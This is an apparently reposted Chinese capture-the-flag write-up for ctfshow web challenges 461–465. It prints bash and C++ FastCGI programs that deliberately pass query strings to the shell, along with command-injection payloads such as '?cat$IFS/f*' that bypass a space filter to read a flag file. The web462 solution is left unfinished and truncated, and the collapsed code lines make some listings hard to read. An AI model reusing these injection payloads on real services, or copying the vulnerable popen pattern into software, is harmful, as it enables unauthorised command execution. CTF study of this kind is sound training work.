本文主要是介绍ctfshow web入门 嵌入式 bash cpp pwn,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
kali转bash shell方法
方便我们本地
bash脚本教程
下面这个代码是bash脚本
#!/bin/bashOIFS="$IFS"IFS="," //表示逗号为字段分隔符set $QUERY_STRING //将参数传入数组Args=($QUERY_STRING)IFS="$OIFS" //恢复原始IFS值if [ "${Args[2]}"ctf = "admin"ctf ]; thenecho "`${Args[0]}$IFS${Args[1]}`"fi //结束if语句
exit 0
我们靠传入的角标为0 1 的值构造命令
?ls,/,admin
?cat,/flag,admin
web462
#!/bin/bashOIFS="$IFS"IFS=","set $QUERY_STRINGArgs=($QUERY_STRING)IFS="$OIFS"if [ "${Args[0]}"ctf = "ping"ctf ]; thenaddr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"addr="ping -c 1 "$addr$addrfi
这个是思路看不懂代码先欠着
addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"这句怎么看都晕,打通以后来改文章
?ping,
web463
#include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>/* just get lastest info */
int _System(const char * cmd, char *pRetMsg, int msg_len)
{FILE * fp;char * p = NULL;int res = -1;if (cmd == NULL || pRetMsg == NULL || msg_len < 0){printf("Param Error!\n");return -1;}if ((fp = popen(cmd, "r") ) == NULL){printf("Popen Error!\n");return -2;}else{memset(pRetMsg, 0, msg_len);//get lastest resultwhile(fgets(pRetMsg, msg_len, fp) != NULL){printf("Msg:%s",pRetMsg); //print all info}if ( (res = pclose(fp)) == -1){printf("close popenerror!\n");return -3;}pRetMsg[strlen(pRetMsg)-1] = '\0';return 0;}
}int main(void)
{int count = 0;char *cmd = "";char a8Result[128] = {0};int ret = 0;while (FCGI_Accept() >= 0)printf("Content-type: text/html\r\n""\r\n""<title>CTFshow</title>""<h1>where is flag?</h1>");cmd=getenv("QUERY_STRING");ret = _System(cmd, a8Result, sizeof(a8Result));printf("ret = %d \nresult = %s\nlength = %d \n", ret, a8Result, strlen(a8Result));return 0;
}
试探性的上了一个ls,回显了,然后过滤了空格,尝试了一下$IFS可以绕过
?cat$IFS/f*
web464
#include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>/* just get lastest info */
int _System(const char * cmd, char *pRetMsg, int msg_len)
{FILE * fp;char * p = NULL;int res = -1;if (cmd == NULL || pRetMsg == NULL || msg_len < 0){printf("Param Error!\n");return -1;}if ((fp = popen(cmd, "r") ) == NULL){printf("Popen Error!\n");return -2;}else{memset(pRetMsg, 0, msg_len);//get lastest resultwhile(fgets(pRetMsg, msg_len, fp) != NULL){printf("Msg:%s",pRetMsg); //print all info}if ( (res = pclose(fp)) == -1){printf("close popenerror!\n");return -3;}pRetMsg[strlen(pRetMsg)-1] = '\0';return 0;}
}int main(void)
{int count = 0;char *cmd = "";char a8Result[128] = {0};int ret = 0;while (FCGI_Accept() >= 0)printf("Content-type: text/html\r\n""\r\n""<title>CTFshow</title>""<h1>where is flag?</h1>");cmd=getenv("QUERY_STRING");ret = _System(cmd, a8Result, sizeof(a8Result));return 0;
}
与上题一样直接秒了
我只是想尝试一下没想到打通了
?cat$IFS/f*
web465
要用pwn 不会
这篇关于ctfshow web入门 嵌入式 bash cpp pwn的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!